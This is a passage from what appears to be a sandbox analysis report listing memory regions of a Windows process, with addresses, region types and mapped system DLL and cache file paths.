filename = ""
Region:
id = 328
start_va = 0xa70000
end_va = 0xaaffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000a70000"
filename = ""
Region:
id = 329
start_va = 0xab0000
end_va = 0xadffff
entry_point = 0xab0000
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db")
Region:
id = 330
start_va = 0xae0000
end_va = 0xb1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ae0000"
filename = ""
Region:
id = 331
start_va = 0xb20000
end_va = 0xb5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b20000"
filename = ""
Region:
id = 332
start_va = 0xb70000
end_va = 0xb7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b70000"
filename = ""
Region:
id = 333
start_va = 0xb90000
end_va = 0xbcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b90000"
filename = ""
Region:
id = 334
start_va = 0xbd0000
end_va = 0xe9efff
entry_point = 0xbd0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 335
start_va = 0xea0000
end_va = 0xedffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ea0000"
filename = ""
Region:
id = 336
start_va = 0xef0000
end_va = 0xf2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ef0000"
filename = ""
Region:
id = 337
start_va = 0xf30000
end_va = 0xf4bfff
entry_point = 0xf30000
region_type = mapped_file
name = "firewallapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui")
Region:
id = 338
start_va = 0xf50000
end_va = 0xf8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000f50000"
filename = ""
Region:
id = 339
start_va = 0xfb0000
end_va = 0xfeffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000fb0000"
filename = ""
Region:
id = 340
start_va = 0x1010000
end_va = 0x104ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001010000"
filename = ""
Region:
id = 341
start_va = 0x1050000
end_va = 0x108ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001050000"
filename = ""
Region:
id = 342
start_va = 0x1090000
end_va = 0x10cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001090000"
filename = ""
Region:
id = 343
start_va = 0x10d0000
end_va = 0x11cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000010d0000"
filename = ""
Region:
id = 344
start_va = 0x1220000
end_va = 0x125ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001220000"
filename = ""
Region:
id = 345
start_va = 0x1260000
end_va = 0x12c5fff
entry_point = 0x1260000
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 346
start_va = 0x12d0000
end_va = 0x130ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000012d0000"
filename = ""
Region:
id = 347
start_va = 0x1330000
end_va = 0x136ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001330000"
filename = ""
Region:
id = 348
start_va = 0x1370000
end_va = 0x13affff
entry_point = 0x0
region_type = private
name = "private_0x0000000001370000"
filename = ""
Region:
id = 349
start_va = 0x13b0000
end_va = 0x13effff
entry_point = 0x0
region_type = private
name = "private_0x00000000013b0000"
filename = ""
Region:
id = 350
start_va = 0x1420000
end_va = 0x145ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001420000"
filename = ""
Region:
id = 351
start_va = 0x1460000
end_va = 0x149ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001460000"
filename = ""
Region:
id = 352
start_va = 0x14c0000
end_va = 0x14fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000014c0000"
filename = ""
Region:
id = 353
start_va = 0x1560000
end_va = 0x159ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001560000"
filename = ""
Region:
id = 354
start_va = 0x15c0000
end_va = 0x15fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000015c0000"
filename = ""
Region:
id = 355
start_va = 0x1600000
end_va = 0x163ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001600000"
filename = ""
Region:
id = 356
start_va = 0x1640000
end_va = 0x173ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001640000"
filename = ""
Region:
id = 357
start_va = 0x1740000
end_va = 0x17bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001740000"
filename = ""
Region:
id = 358
start_va = 0x17f0000
end_va = 0x182ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000017f0000"
filename = ""
Region:
id = 359
start_va = 0x1830000
end_va = 0x186ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001830000"
filename = ""
Region:
id = 360
start_va = 0x1870000
end_va = 0x18affff
entry_point = 0x0
region_type = private
name = "private_0x0000000001870000"
filename = ""
Region:
id = 361
start_va = 0x18d0000
end_va = 0x190ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000018d0000"
filename = ""
Region:
id = 362
start_va = 0x1990000
end_va = 0x19cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001990000"
filename = ""
Region:
id = 363
start_va = 0x19f0000
end_va = 0x1a2ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000019f0000"
filename = ""
Region:
id = 364
start_va = 0x1aa0000
end_va = 0x1adffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001aa0000"
filename = ""
Region:
id = 365
start_va = 0x1ae0000
end_va = 0x1b1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001ae0000"
filename = ""
Region:
id = 366
start_va = 0x1b50000
end_va = 0x1b8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001b50000"
filename = ""
Region:
id = 367
start_va = 0x1b90000
end_va = 0x1bcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001b90000"
filename = ""
Region:
id = 368
start_va = 0x1bd0000
end_va = 0x1ccffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001bd0000"
filename = ""
Region:
id = 369
start_va = 0x1ce0000
end_va = 0x1d1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001ce0000"
filename = ""
Region:
id = 370
start_va = 0x1d40000
end_va = 0x1d7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001d40000"
filename = ""
Region:
id = 371
start_va = 0x1d90000
end_va = 0x1dcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001d90000"
filename = ""
Region:
id = 372
start_va = 0x1dd0000
end_va = 0x1e0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001dd0000"
filename = ""
Region:
id = 373
start_va = 0x1e90000
end_va = 0x1ecffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001e90000"
filename = ""
Region:
id = 374
start_va = 0x1f40000
end_va = 0x1f4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001f40000"
filename = ""
Region:
id = 375
start_va = 0x1f70000
end_va = 0x1faffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001f70000"
filename = ""
Region:
id = 376
start_va = 0x1fd0000
end_va = 0x20cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001fd0000"
filename = ""
Region:
id = 377
start_va = 0x2110000
end_va = 0x214ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002110000"
filename = ""
Region:
id = 378
start_va = 0x21a0000
end_va = 0x21dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000021a0000"
filename = ""
Region:
id = 379
start_va = 0x2200000
end_va = 0x223ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002200000"
filename = ""
Region:
id = 380
start_va = 0x2280000
end_va = 0x22bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002280000"
filename = ""
Region:
id = 381
start_va = 0x22d0000
end_va = 0x230ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000022d0000"
filename = ""
Region:
id = 382
start_va = 0x2310000
end_va = 0x240ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002310000"
filename = ""
Region:
id = 383
start_va = 0x2410000
end_va = 0x244ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002410000"
filename = ""
Region:
id = 384
start_va = 0x2480000
end_va = 0x24bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002480000"
filename = ""
Region:
id = 385
start_va = 0x2530000
end_va = 0x262ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002530000"
filename = ""
Region:
id = 386
start_va = 0x27a0000
end_va = 0x27dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000027a0000"
filename = ""
Region:
id = 387
start_va = 0x2920000
end_va = 0x295ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002920000"
filename = ""
Region:
id = 388
start_va = 0x6d490000
end_va = 0x6d4bffff
entry_point = 0x6d490000
region_type = mapped_file
name = "tcpipcfg.dll"
filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll")
Region:
id = 389
start_va = 0x6d4c0000
end_va = 0x6d4d6fff
entry_point = 0x6d4c0000
region_type = mapped_file
name = "rascfg.dll"
filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll")
Region:
id = 390
start_va = 0x6dfb0000
end_va = 0x6dfb7fff
entry_point = 0x6dfb0000
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 391
start_va = 0x6e0d0000
end_va = 0x6e129fff
entry_point = 0x6e0d0000
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 392
start_va = 0x6e130000
end_va = 0x6e179fff
entry_point = 0x6e130000
region_type = mapped_file
name = "hnetcfg.dll"
filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll")
Region:
id = 393
start_va = 0x6e180000
end_va = 0x6e193fff
entry_point = 0x6e180000
region_type = mapped_file
name = "resutils.dll"
filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll")
Region:
id = 394
start_va = 0x6e1a0000
end_va = 0x6e1dafff
entry_point = 0x6e1a0000
region_type = mapped_file
name = "clusapi.dll"
filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll")
Region:
id = 395
start_va = 0x6e1e0000
end_va = 0x6e1e5fff
entry_point = 0x6e1e0000
region_type = mapped_file
name = "sscore.dll"
filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll")
Region:
id = 396
start_va = 0x6e1f0000
end_va = 0x6e205fff
entry_point = 0x6e1f0000
region_type = mapped_file
name = "nci.dll"
filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll")
Region:
id = 397
start_va = 0x6e220000
end_va = 0x6e275fff
entry_point = 0x6e220000
region_type = mapped_file
name = "wbemess.dll"
filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll")
Region:
id = 398
start_va = 0x6e280000
end_va = 0x6e28efff
entry_point = 0x6e280000
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 399
start_va = 0x6e290000
end_va = 0x6e310fff
entry_point = 0x6e290000
region_type = mapped_file
name = "wmiprvsd.dll"
filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll")
Region:
id = 400
start_va = 0x6e320000
end_va = 0x6e386fff
entry_point = 0x6e320000
region_type = mapped_file
name = "netcfgx.dll"
filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll")
Region:
id = 401
start_va = 0x6e390000
end_va = 0x6e3dbfff
entry_point = 0x6e390000
region_type = mapped_file
name = "repdrvfs.dll"
filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll")
Region:
id = 402
start_va = 0x6e3e0000
end_va = 0x6e3f6fff
entry_point = 0x6e3e0000
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 403
start_va = 0x6e400000
end_va = 0x6e41afff
entry_point = 0x6e400000
region_type = mapped_file
name = "browser.dll"
filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll")
Region:
id = 404
start_va = 0x6e420000
end_va = 0x6e44bfff
entry_point = 0x6e420000
region_type = mapped_file
name = "srvsvc.dll"
filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll")
Region:
id = 405
start_va = 0x6e450000
end_va = 0x6e45efff
entry_point = 0x6e450000
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 406
start_va = 0x6e460000
end_va = 0x6e4a3fff
entry_point = 0x6e460000
region_type = mapped_file
name = "esscli.dll"
filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll")
Region:
id = 407
start_va = 0x6e4b0000
end_va = 0x6e571fff
entry_point = 0x6e4b0000
region_type = mapped_file
name = "wbemcore.dll"
filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll")
Region:
id = 408
start_va = 0x6e580000
end_va = 0x6e589fff
entry_point = 0x6e580000
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 409
start_va = 0x6e590000
end_va = 0x6e5a7fff
entry_point = 0x6e590000
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 410
start_va = 0x6e5b0000
end_va = 0x6e645fff
entry_point = 0x6e5b0000
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 411
start_va = 0x6e680000
end_va = 0x6e6b1fff
entry_point = 0x6e680000
region_type = mapped_file
name = "wdscore.dll"
filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll")
Region:
id = 412
start_va = 0x6e6c0000
end_va = 0x6e6f2fff
entry_point = 0x6e6c0000
region_type = mapped_file
name = "sqmapi.dll"
filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")
Region:
id = 413
start_va = 0x6e700000
end_va = 0x6e77cfff
entry_point = 0x6e700000
region_type = mapped_file
name = "iphlpsvc.dll"
filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll")
Region:
id = 414
start_va = 0x6e780000
end_va = 0x6e7dbfff
entry_point = 0x6e780000
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 415
start_va = 0x6e7e0000
end_va = 0x6e80afff
entry_point = 0x6e7e0000
region_type = mapped_file
name = "wmisvc.dll"
filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll")
Region:
id = 416
start_va = 0x6f580000
end_va = 0x6f5cdfff
entry_point = 0x6f580000
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 417
start_va = 0x6f650000
end_va = 0x6f65cfff
entry_point = 0x6f650000
region_type = mapped_file
name = "ndiscapcfg.dll"
filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll")
Region:
id = 418
start_va = 0x70020000
end_va = 0x70025fff
entry_point = 0x70020000
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 419
start_va = 0x71400000
end_va = 0x71407fff
entry_point = 0x71400000
region_type = mapped_file
name = "tschannel.dll"
filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll")
Region:
id = 420
start_va = 0x71450000
end_va = 0x7145ffff
entry_point = 0x71450000
region_type = mapped_file
name = "vsstrace.dll"
filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll")
Region:
id = 421
start_va = 0x71460000
end_va = 0x71575fff
entry_point = 0x71460000
region_type = mapped_file
name = "vssapi.dll"
filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll")
Region:
id = 422
start_va = 0x71af0000
end_va = 0x71afefff
entry_point = 0x71af0000
region_type = mapped_file
name = "appinfo.dll"
filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll")
Region:
id = 423
start_va = 0x72900000
end_va = 0x72928fff
entry_point = 0x72900000
region_type = mapped_file
name = "mprapi.dll"
filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll")
Region:
id = 424
start_va = 0x72f60000
end_va = 0x72facfff
entry_point = 0x72f60000
region_type = mapped_file
name = "taskcomp.dll"
filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")
Region:
id = 425
start_va = 0x73080000
end_va = 0x7308cfff
entry_point = 0x73080000
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 426
start_va = 0x731b0000
end_va = 0x731befff
entry_point = 0x731b0000
region_type = mapped_file
name = "samcli.dll"
filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")
Region:
id = 427
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 428
start_va = 0x736e0000
end_va = 0x736f1fff
entry_point = 0x736e0000
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 429
start_va = 0x739e0000
end_va = 0x73a0efff
entry_point = 0x739e0000
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 430
start_va = 0x73a10000
end_va = 0x73a18fff
entry_point = 0x73a10000
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 431
start_va = 0x73a20000
end_va = 0x73ad9fff
entry_point = 0x73a20000
region_type = mapped_file
name = "schedsvc.dll"
filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")
Region:
id = 432
start_va = 0x73ae0000
end_va = 0x73aeafff
entry_point = 0x73ae0000
region_type = mapped_file
name = "wiarpc.dll"
filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll")
Region:
id = 433
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 434
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 435
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 436
start_va = 0x73b30000
end_va = 0x73b37fff
entry_point = 0x73b30000
region_type = mapped_file
name = "fvecerts.dll"
filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll")
Region:
id = 437
start_va = 0x73b40000
end_va = 0x73b46fff
entry_point = 0x73b40000
region_type = mapped_file
name = "tbs.dll"
filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll")
Region:
id = 438
start_va = 0x73b50000
end_va = 0x73b92fff
entry_point = 0x73b50000
region_type = mapped_file
name = "fveapi.dll"
filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")
Region:
id = 439
start_va = 0x73ba0000
end_va = 0x73bf1fff
entry_point = 0x73ba0000
region_type = mapped_file
name = "shsvcs.dll"
filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")
Region:
id = 440
start_va = 0x73c00000
end_va = 0x73c11fff
entry_point = 0x73c00000
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 441
start_va = 0x73c20000
end_va = 0x73c57fff
entry_point = 0x73c20000
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 442
start_va = 0x73c60000
end_va = 0x73c6efff
entry_point = 0x73c60000
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 443
start_va = 0x73c70000
end_va = 0x73c7cfff
entry_point = 0x73c70000
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 444
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 445
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 446
start_va = 0x73db0000
end_va = 0x73df6fff
entry_point = 0x73db0000
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 447
start_va = 0x73e00000
end_va = 0x73e0cfff
entry_point = 0x73e00000
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 448
start_va = 0x73e10000
end_va = 0x73e19fff
entry_point = 0x73e10000
region_type = mapped_file
name = "slc.dll"
filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")
Region:
id = 449
start_va = 0x73e20000
end_va = 0x73e28fff
entry_point = 0x73e20000
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 450
start_va = 0x73e30000
end_va = 0x73e3bfff
entry_point = 0x73e30000
region_type = mapped_file
name = "themeservice.dll"
filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")
Region:
id = 451
start_va = 0x73e40000
end_va = 0x73e53fff
entry_point = 0x73e40000
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")
Region:
id = 452
start_va = 0x73e60000
end_va = 0x73e8afff
entry_point = 0x73e60000
region_type = mapped_file
name = "profsvc.dll"
filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")
Region:
id = 453
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 454
start_va = 0x74070000
end_va = 0x7407ffff
entry_point = 0x74070000
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 455
start_va = 0x74080000
end_va = 0x74112fff
entry_point = 0x74080000
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Region:
id = 456
start_va = 0x74260000
end_va = 0x74271fff
entry_point = 0x74260000
region_type = mapped_file
name = "mmcss.dll"
filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll")
Region:
id = 457
start_va = 0x74280000
end_va = 0x74286fff
entry_point = 0x74280000
region_type = mapped_file
name = "avrt.dll"
filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll")
Region:
id = 458
start_va = 0x74290000
end_va = 0x74384fff
entry_point = 0x74290000
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 459
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 460
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 461
start_va = 0x745d0000
end_va = 0x74645fff
entry_point = 0x745d0000
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 462
start_va = 0x74650000
end_va = 0x74654fff
entry_point = 0x74650000
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 463
start_va = 0x746d0000
end_va = 0x746dafff
entry_point = 0x746d0000
region_type = mapped_file
name = "pcwum.dll"
filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")
Region:
id = 464
start_va = 0x74700000
end_va = 0x74715fff
entry_point = 0x74700000
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 465
start_va = 0x74720000
end_va = 0x74736fff
entry_point = 0x74720000
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 466
start_va = 0x74740000
end_va = 0x74754fff
entry_point = 0x74740000
region_type = mapped_file
name = "spinf.dll"
filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll")
Region:
id = 467
start_va = 0x747e0000
end_va = 0x7480bfff
entry_point = 0x747e0000
region_type = mapped_file
name = "ubpm.dll"
filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")
Region:
id = 468
start_va = 0x74810000
end_va = 0x74817fff
entry_point = 0x74810000
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 469
start_va = 0x748c0000
end_va = 0x748cdfff
entry_point = 0x748c0000
region_type = mapped_file
name = "devrtl.dll"
filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")
Region:
id = 470
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
